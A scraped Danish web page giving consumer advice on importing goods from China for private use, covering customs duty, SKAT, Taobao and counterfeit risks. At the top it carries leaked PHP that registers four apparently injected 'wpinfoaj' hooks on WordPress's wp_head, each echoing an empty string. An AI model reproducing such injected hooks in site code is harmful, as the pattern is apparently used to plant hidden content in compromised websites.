add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Kina import til privat brug – kan det betale sig? | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Kina import til privat brug – kan det betale sig?

Det kan i mange tilfælde godt betale sig, at importere fra Kina til privat brug, men det afhænger af, hvor mange produkter du vil købe og hvad tolden er på det givne produkt.

Med hensyn til told, så er tolden forskellig på alle produkter, som man importerer fra Kina, og det er derfor en god ide, at kontakte SKAT direkte, for at få oplyst den præcise told, på det du vil importere. Kontakt SKAT her. Eller brug toldberegneren til at udregne hvad tolden er, på det du ønsker at importere fra Kina.

Grunden til at mange ofte er i tvivl og tror, at det ikke kan betale sig at importere til privat brug, er jo, at man som privatperson kun er interesseret i at importere én ting eller et meet lille parti. Det giver næsten sig selv, at for fabrikkernes vedkommende og for forhandlerne i Kina, så får man lavere pris, jo større mængde man bestiller. Det gælder dog også, at hvis man bevare en venlig og imødekommende tone, og beder om rabat, så får man det ofte. Det er altid en billigere måde at gøre tingene på, der kan altid sænkes lidt på prisen i forhold til transport og lignende.

Flere større firmaer i Kina tilbyder direkte fragt af din købte vare hjem til dig. Se for eksempel hos Taobao, som er én af de største websites med en enorm stor mængde kinesiske butikker tilknyttet, så udvalget er rigtig stort. Du kan vælge imellem alt fra tøj og sko til køkken udstyr og cykler. Og udvalget af forhandlere som sælger, det du vil købe, er også stort. Du skal dog være opmærksom på kopivare, og at man ikke altid kan regne med det som butikken skriver om sig selv og sine produkter. På taobao kan du også finde en manual på engelsk, så det er til at gå til for os danskere, som ikke læser kinesisk. Desuden kan der tilkomme en bøde, hvis det er kopivare og du får en stor forsendelse, så vil det ligne det er med tanke på videresalg, for told i Danmark.

Ved fragt til Danmark, skal man dog også være opmærksom på at Post Danmark kan lægge told på forsendelsen. Tjek derfor gerne med Post Danmark. Den generelle regel er at alt som sendes til Danmark som har en værdi af 80 kr eller derunder excl. moms er toldfrit. For at få de specifikke toldsatser for produkter importeret til Kina, så kontakt SKAT.